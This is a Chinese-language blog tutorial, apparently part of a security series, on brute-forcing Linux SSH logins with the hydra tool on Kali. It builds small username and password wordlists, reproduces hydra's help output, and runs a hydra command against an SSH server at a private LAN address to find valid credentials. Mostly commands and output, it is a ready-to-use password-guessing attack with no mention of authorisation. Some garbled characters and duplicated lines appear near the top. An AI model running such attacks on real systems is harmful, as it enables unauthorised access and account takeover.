網絡安全：暴力破解Linux遠程ssh登陸賬號與密碼（十二）

Linux ç½ç»å®å¨ Line æç§ç³»ç» ææ¯ åæä¸èµ·èµ°å§ 和我一起走吧 2017-11-21

破解Linux 遠程登陸賬號與密碼的方式有很多中，你今天來學習一下 hydra破解工具

下載方式網站：https://www.thc.org/thc-hydra/

破解Linux 遠程登陸賬號與密碼的方式有很多中，你今天來學習一下 hydra破解工具

下載方式網站：https://www.thc.org/thc-hydra/

網絡安全：暴力破解Linux遠程ssh登陸賬號與密碼（十二）

今天我們使用的是KALI系統該系統是自帶了很多破解工具，就不用安裝啦。

下面我們來演示一下破解方法

一、生成一個賬號文件，user.txt （名稱自定義即可），在user.txt 裡是需要破解的賬號

root@ULINK:~# more user.txt

root

admin

admins

root@ULINK:~#

二、生成一個密碼文件，pass.txt (名稱自定義即可),在pass.txt 是破解賬號需要的密碼.

root@ULINK:~# more pass.txt

123

1234

12345

123456

1234567

12345678

123456789

1234567890

root@ULINK:~#

三查看hydra 使用幫助

oot@ULINK:~# hydra -help | more

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [serv

ice://server[:PORT][/OPT]]

Options:

-R restore a previous aborted/crashed session

-S perform an SSL connect

-s PORT if the service is on a different default port, define it here

-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE

-p PASS or -P FILE try password PASS, or load several passwords from FILE

-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help

-e nsr try "n" null password, "s" login as pass and/or "r" reversed login

-u loop around users, not passwords (effective! implied with -x)

-C FILE colon separated "login:pass" format, instead of -L/-P options

-M FILE list of servers to attack, one entry per line, ':' to specify port

-o FILE write found login/password pairs to FILE instead of stdout

-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)

-t TASKS run TASKS number of connects in parallel (per host, default: 16)

-w / -W TIME waittime for responses (32) / between connects per thread (0)

-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)

-v / -V / -d verbose mode / show login+pass for each attempt / debug mode

-O use old SSL v2 and v3

-q do not print messages about connection errors

-U service module usage details

server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)

service the service to crack (see below for supported protocols)

OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|diges

t}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak t

elnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL

v3.0. The newest version is always available at http://www.thc.org/thc-hydra

Don't use in military or secret service organizations, or for illegal purposes.

These services were not compiled in: sapr3 afp ncp oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.

E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)

% export HYDRA_PROXY_HTTP=http://proxy:8080

% export HYDRA_PROXY_AUTH=user:pass

Examples:

hydra -l user -P passlist.txt ftp://192.168.0.1

hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

hydra -l admin -p password ftp://[192.168.0.0/24]/

hydra -L logins.txt -P pws.txt -M targets.txt ssh

root@ULINK:~#

四我們破解192.168.169.148服務器的ssh 賬號和密碼

root@ULINK:~# hydra -L user.txt -P pass.txt -e n -vV 192.168.169.148 ssh

其中顯示綠色的是服務器具有賬號和密碼